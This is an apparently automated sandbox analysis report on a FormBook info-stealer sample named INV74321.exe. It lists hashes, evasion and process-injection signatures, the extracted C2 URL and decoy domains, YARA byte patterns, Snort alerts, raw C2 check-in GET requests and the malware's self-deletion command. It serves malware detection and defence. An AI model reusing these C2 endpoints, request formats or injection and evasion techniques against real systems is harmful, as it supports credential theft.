Analysis Report INV74321.exe

Overview

General Information

Sample Name: INV74321.exe
Analysis ID: 411840
MD5: 877bb5661fe79bb7f48cfb3ea54537a0
SHA1: dd6b5263da3b4f1a42e89c2c1ade852098561c5d
SHA256: 87935ff36515ecb6a4177c25ad1d11e8d2882aa1c3f369e719406f063a062517
Tags: exe, Formbook
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • INV74321.exe (PID: 5520 cmdline: 'C:\Users\user\Desktop\INV74321.exe' MD5: 877BB5661FE79BB7F48CFB3EA54537A0)
    • INV74321.exe (PID: 4604 cmdline: 'C:\Users\user\Desktop\INV74321.exe' MD5: 877BB5661FE79BB7F48CFB3EA54537A0)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6292 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6480 cmdline: /c del 'C:\Users\user\Desktop\INV74321.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • (matched strings and offsets identical to the Formbook_1 match on the first memory dump above)

Unpacked PEs

Source | Rule | Description | Author
1.1.INV74321.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.INV74321.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.INV74321.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
0.2.INV74321.exe.29a0000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.INV74321.exe.29a0000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • (matched strings and offsets identical to the Formbook_1 match on 1.1.INV74321.exe.400000.0.unpack above)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll | Metadefender: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll | ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: INV74321.exe | Virustotal: Detection: 30%
Source: INV74321.exe | Metadefender: Detection: 14%
Source: INV74321.exe | ReversingLabs: Detection: 72%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
Source: 1.1.INV74321.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.INV74321.exe.29a0000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.INV74321.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: INV74321.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: INV74321.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: MusNotifyIcon.pdb | source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: INV74321.exe, 00000000.00000003.214730841.0000000002B90000.00000004.00000001.sdmp, INV74321.exe, 00000001.00000002.257577232.0000000000BCF000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: INV74321.exe, wlanext.exe
Source: Binary string: wlanext.pdb | source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
Source: Binary string: MusNotifyIcon.pdbGCTL | source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL | source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\INV74321.exe | Code function: 0_2_0040646B FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\INV74321.exe | Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\INV74321.exe | Code function: 0_2_004027A1 FindFirstFileA,
Source: C:\Users\user\Desktop\INV74321.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\INV74321.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.nobleandmarble.com/or4i/
Source: global traffic | HTTP traffic detected: GET /or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH HTTP/1.1 Host: www.king-jackpot.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn HTTP/1.1 Host: www.0o-a-8v4l76.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH HTTP/1.1 Host: www.downtoearthwork.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH HTTP/1.1 Host: www.topcasino-111.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N HTTP/1.1 Host: www.shebagholdings.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH HTTP/1.1 Host: www.booweats.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh HTTP/1.1 Host: www.xn--espacesacr-k7a.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 64.190.62.111
Source: Joe Sandbox View | ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View | ASN Name: NBS11696US
Source: unknown | DNS traffic detected: queries for: www.aqayeseo.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 12 May 2021 05:36:25 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 24 Feb 2021 17:47:31 GMT Accept-Ranges: bytes Content-Length: 583 Vary: Accept-Encoding Content-Type: text/html Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
Source: explorer.exe, 00000005.00000000.244675991.000000000F640000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: INV74321.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: INV74321.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: wlanext.exe, 00000008.00000002.475299853.0000000003E62000.00000004.00000001.sdmp | String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lande
Source: C:\Users\user\Desktop\INV74321.exe | Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match (the same eight memory dumps and six unpacked PEs listed under AV Detection above)

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_004181C0 NtCreateFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00418270 NtReadFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_004182F0 NtClose
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_004183A0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_004181BA NtCreateFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_0041826C NtReadFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_004182EA NtClose
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B198F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B199A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B195D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B196E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19660 NtAllocateVirtualMemory, LdrInitializeThunk
